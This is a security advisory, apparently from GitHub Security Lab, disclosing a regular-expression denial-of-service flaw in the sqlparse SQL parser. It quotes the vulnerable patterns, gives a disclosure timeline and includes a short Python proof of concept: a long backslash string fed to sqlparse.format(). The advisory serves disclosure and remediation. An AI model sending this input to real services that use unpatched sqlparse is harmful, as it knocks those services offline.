Coordinated Disclosure Timeline
- 2023-01-27: Report Sent
- 2023-04-18: Vulnerability patched along with advisory release
SQLparse has a ReDoS (regular expression denial of service) in the parser for SQL expressions.
Issue: ReDoS in
Both the String.Single and the String.Symbol regular expressions are vulnerable:
SQL_REGEX = [ ... (r"'(''|\\\\|\\'|[^'])*'", tokens.String.Single), ... (r'"(""|\\\\|\\"|[^"])*"', tokens.String.Symbol), ... ]
This issue was found using the following CodeQL query
This vulnerability may lead to Denial of Service (DOS).
Proof of Concept
The following code will use the
sqlparse.format() function to parse an attacker-controlled string, leading to a denial of service condition:
import sqlparse attack = "'\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\" res = sqlparse.format(attack) print(res)
This issue was discovered by @erik-krogh (Erik Krogh Kristensen).
You can contact the GHSL team at
email@example.com, please include a reference to
GHSL-2023-001 in any communication regarding this issue.